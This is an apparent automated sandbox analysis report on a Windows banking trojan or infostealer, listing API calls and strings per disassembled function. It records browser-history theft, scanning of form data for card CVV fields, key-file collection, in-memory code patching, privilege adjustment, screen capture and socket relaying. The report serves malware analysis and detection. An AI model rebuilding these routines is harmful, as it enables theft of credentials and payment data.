                                                                                                                                                                                                              • Instruction ID: bf2c7edbafd0b715bbdcf97b5e56f5478e5837754abe09e067758a289e3d11b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b4ef6e83ed3c8eb3a9a66456d022271692efbbb73ddc2432dcf5e9130aa8914
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 936114325143429FD7325F2CA928BA6BFD4BF4A704F5980ACEB89CB352DA70D405CB94
                                                                                                                                                                                                              Function 012FD26C Relevance: 42.3, APIs: 17, Strings: 7, Instructions: 259fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FD278
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,found.), ref: 012FD293
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,asus), ref: 012FD2AE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FD2D4
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FD30E
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FD318
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FD320
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FD32F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FD336
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB,?,?), ref: 012FD3D9
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FD413
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FD41D
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FD425
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FD434
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FD43B
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 012FD52F
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 012FD563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Error$LastPath$#680BackslashCreateDirectoryFileFolderMakeSystem$AttributesFindModeNext
                                                                                                                                                                                                              • String ID: .txt$.zip$61C5C0CB$asus$found.$keys$path
                                                                                                                                                                                                              • API String ID: 4136576029-79601650
                                                                                                                                                                                                              • Opcode ID: 74c924c54f8c08451279f4293f63c3a0a0cc30f104a259407f6db66116dd67a2
                                                                                                                                                                                                              • Instruction ID: e199b52eeb897283c4dc8d595abaa2bf5bb5706ff75f9b2e65ce62de9ded48aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74c924c54f8c08451279f4293f63c3a0a0cc30f104a259407f6db66116dd67a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F991C53010834A8FCB269F7894686EBBBE9EF85345F14856CFAC6D7201DB71D509CB91
                                                                                                                                                                                                              Function 012E4900 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 178fileregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 012E4925
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,url%i,00000001), ref: 012E494D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,774D3490), ref: 012E4987
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E49A9
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E49B5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,IE history:,0000000C,012E58F1,00000000), ref: 012E49C9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 012E49D7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E49EB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 012E49F7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325C1C,00000001,00000000,00000000), ref: 012E4A0B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 012E4A19
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4A43
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E4A4F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 012E4A64
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 012E4A74
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E4A88
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4A94
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,01325B88,00000002,00000000,00000000), ref: 012E4AA8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 012E4AB6
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,url%i,00000002), ref: 012E4AD5
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E4AEC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                              • API String ID: 757183407-427538202
                                                                                                                                                                                                              • Opcode ID: b4d257d7f48333441688bbd87612f546961507a76b1c3d9eae1b06f7484cd2b2
                                                                                                                                                                                                              • Instruction ID: 465b1ba1251815aac05fd156df7474a8b169365a9717d48f41812f4d4dcedc71
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4d257d7f48333441688bbd87612f546961507a76b1c3d9eae1b06f7484cd2b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30513871691319BAFB30AB949C4AFEE7ABCEB45B05F104148F700BA1C1E7F05B448BA5
                                                                                                                                                                                                              Function 01304018 Relevance: 40.6, APIs: 17, Strings: 6, Instructions: 313COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01304037
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01304075
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0130407F
                                                                                                                                                                                                              • #680.SHELL32 ref: 01304087
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01304098
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0130409F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,?), ref: 013040FD
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0130410C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01304137
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,keys%i.zip,00000000), ref: 01304197
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C,?,00000000), ref: 013041D7
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,path%i.txt,00000000), ref: 01304237
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D19C), ref: 01304297
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorLast_snprintf$#680AttributesCreateDirectoryFileFolderMakeSystem
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Mw$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                              • API String ID: 3788559835-942948650
                                                                                                                                                                                                              • Opcode ID: a9ff5afcf810f61e5a390110f45730bb18680e5453cb82d48cb51d55e45022e4
                                                                                                                                                                                                              • Instruction ID: 6d97a69855d9aa0a1bdf1d9e48b3605ab6cdbee88dda4ac3e7cd6c6f882b404e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9ff5afcf810f61e5a390110f45730bb18680e5453cb82d48cb51d55e45022e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BB14F30A0064A5BCB27DF7C98797FA7BE9BF4A304F144598EA96D7281DB709B48C740
                                                                                                                                                                                                              Function 012EDA20 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 192filesynchronizationmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32(00000000,00000000), ref: 012EDA2D
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 012EDA3E
                                                                                                                                                                                                                • Part of subcall function 012ED970: GetComputerNameA.KERNEL32(0132F588,?,774CF550,775B7390,774D0A60,?,?,012F76EC), ref: 012ED987
                                                                                                                                                                                                                • Part of subcall function 012ED970: lstrlenA.KERNEL32(0132F588,?,?,012F76EC), ref: 012ED992
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F5A0,MSCTF.Shared.MAPPING.%x,?,?,?,012F76EC), ref: 012ED9D2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F54C,MSCTF.Shared.MAPPING.%x,774D0A60,?,?,?,012F76EC), ref: 012ED9E2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F5DC,MSCTF.Shared.MAPPING.%x,?,?,?,?,012F76EC), ref: 012ED9F2
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F670,MSCTF.Shared.MUTEX.%x,?,?,?,?,?,012F76EC), ref: 012ED9FF
                                                                                                                                                                                                                • Part of subcall function 012ED970: wsprintfA.USER32(0132F630,MSCTF.Shared.MUTEX.%x,774D0A60,?,?,?,?,?,012F76EC), ref: 012EDA0C
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,0132F5A0), ref: 012EDA6A
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EDA83
                                                                                                                                                                                                                • Part of subcall function 012E9020: SetThreadDesktop.USER32(?,774CF590,774C16B0,?), ref: 012E902F
                                                                                                                                                                                                                • Part of subcall function 012E9020: GetDC.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9037
                                                                                                                                                                                                                • Part of subcall function 012E9020: GetDeviceCaps.GDI32(00000000,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9048
                                                                                                                                                                                                                • Part of subcall function 012E9020: GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9059
                                                                                                                                                                                                                • Part of subcall function 012E9020: CreateCompatibleBitmap.GDI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9070
                                                                                                                                                                                                                • Part of subcall function 012E9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 012E90B2
                                                                                                                                                                                                                • Part of subcall function 012E9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 012E90C2
                                                                                                                                                                                                                • Part of subcall function 012E9020: DeleteObject.GDI32(00000000), ref: 012E90C5
                                                                                                                                                                                                                • Part of subcall function 012E9020: ReleaseDC.USER32(00000000,00000000), ref: 012E90CE
                                                                                                                                                                                                                • Part of subcall function 012E9020: HeapFree.KERNEL32(00000000,00000000,?), ref: 012E9129
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,0132F54C), ref: 012EDAB0
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EDAC3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,0132F670), ref: 012EDAE1
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 012EDAFF
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 012EDB20
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(0132F670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012EDB3D
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 012EDB47
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 012EDB61
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,0132F630), ref: 012EDB79
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012EDB97
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000000,?), ref: 012EDBB8
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(0132F630,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012EDBD5
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 012EDBDF
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 012EDBFD
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 012EDC10
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 012EDC23
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,0132F5DC), ref: 012EDC39
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$Security$Descriptor$wsprintf$EventFile$FreeMutexThreadToken$BitsCapsConvertCurrentDeviceHeapInfoLocalMappingNamedOpenProcessSaclStringView$AdjustBitmapCloseCompatibleComputerCountDeleteDesktopErrorHandleLastLookupNameObjectPrivilegePrivilegesReleaseTickValuelstrlen
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 3555772620-820036962
                                                                                                                                                                                                              • Opcode ID: b107a66f44ab06e5c9eee913ef003d5672f73f04cf37d5b1711aec1316d6c6ad
                                                                                                                                                                                                              • Instruction ID: a1371aec2c6f52646a8e7d6f323f9b5e0e22f0cf592f08aea2ea855dd7ec85b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b107a66f44ab06e5c9eee913ef003d5672f73f04cf37d5b1711aec1316d6c6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B515471B9431ABAFB30AFA59C4AF997BBCAB44F51F144119F700BA1C4E6F0A5008B65
                                                                                                                                                                                                              Function 012FA350 Relevance: 37.7, APIs: 25, Instructions: 190threadmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(00000000,00000000,?,01324DD0,0132AE48,000000FF,?,012FA660,00000000,00000000), ref: 012FA376
                                                                                                                                                                                                              • GetThreadPriority.KERNEL32(00000000,?,012FA660,00000000,00000000,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA37D
                                                                                                                                                                                                              • GetTickCount.KERNEL32(?,012FA660,00000000,00000000,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA386
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(012FA660,00000008,00000040,?,?,012FA660,00000000,00000000,?,?,?,?,?,?,012F98DA,00000000), ref: 012FA3A7
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 012FA3C6
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 012FA3E2
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000004), ref: 012FA3F8
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 012FA406
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 012FA411
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 012FA424
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 012FA435
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 012FA444
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 012FA453
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 012FA462
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000006,?), ref: 012FA46A
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 012FA47D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 012FA48E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 012FA49D
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000005,00000000), ref: 012FA4A9
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 012FA4B3
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(00000002), ref: 012FA4BB
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 012FA4C2
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(?), ref: 012FA4FE
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 012FA505
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(012FA660,00000008,00000000,012FA660), ref: 012FA51F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2984368831-0
                                                                                                                                                                                                              • Opcode ID: 395d74a5eca2fe3ad36ce7774bb108e070409da57b19d090f743410ea75db712
                                                                                                                                                                                                              • Instruction ID: 66ba2ac43e897611f305aaf936e3eb1ee29d20ad38cbc0c5832e8fbfd533977f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 395d74a5eca2fe3ad36ce7774bb108e070409da57b19d090f743410ea75db712
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A512171501219AFEB21AF74CC46FAE77ACFF49720F15452CF945E7280DA78A941CBA0
                                                                                                                                                                                                              Function 012FE3F0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 145memorystringthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE433
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE441
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE44D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE45B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE467
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE479
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,&domain=letitbit.net&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE48F
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,01329A24,?,012F8A44,?,?,?,?,?), ref: 012FE4A2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?), ref: 012FE50B
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 012FE512
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,-00000011,?,?,?,?,?,?,?,?,?), ref: 012FE522
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FE580,00000000,00000000,00000000), ref: 012FE548
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FE560
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FE571
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                              • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                              • API String ID: 1632825432-2817208116
                                                                                                                                                                                                              • Opcode ID: 4038a09ae4d68e73ecb7025ec9288ae78c752d7f3b714c73885eb78e492a7ff8
                                                                                                                                                                                                              • Instruction ID: c763a11a08e037e16b6e992ed061a55fb5ff5a7247da2e324c0b1c74afbe2876
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4038a09ae4d68e73ecb7025ec9288ae78c752d7f3b714c73885eb78e492a7ff8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50412A31A5272B27E333162C7C5EFBABA9D8F42701F1B412CEF4097261FA51C60582A4
                                                                                                                                                                                                              Function 012F9B20 Relevance: 36.3, APIs: 24, Instructions: 271networkmemorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 012F9B39
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F9B42
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 012F9B4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F9B4F
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 012F9B75
                                                                                                                                                                                                              • send.WS2_32(?,01329E4C,00000002,00000000), ref: 012F9BCC
                                                                                                                                                                                                              • send.WS2_32(?,0132E1CC,00000002,00000000), ref: 012F9BF2
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 012F9C18
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 012F9C92
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000005), ref: 012F9CC7
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 012F9D0D
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 012F9D24
                                                                                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 012F9D37
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 012F9D47
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 012F9D5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000005), ref: 012F9D67
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F9D6E
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000006), ref: 012F9D7A
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 012F9D9C
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 012F9DB6
                                                                                                                                                                                                              • send.WS2_32(?,?,0000000A,00000000), ref: 012F9DD0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00019970,?,00000000,00000000), ref: 012F9DEA
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 012F9CBC
                                                                                                                                                                                                                • Part of subcall function 012F98F0: shutdown.WS2_32(?,00000001), ref: 012F990B
                                                                                                                                                                                                                • Part of subcall function 012F98F0: shutdown.WS2_32(?,00000001), ref: 012F9910
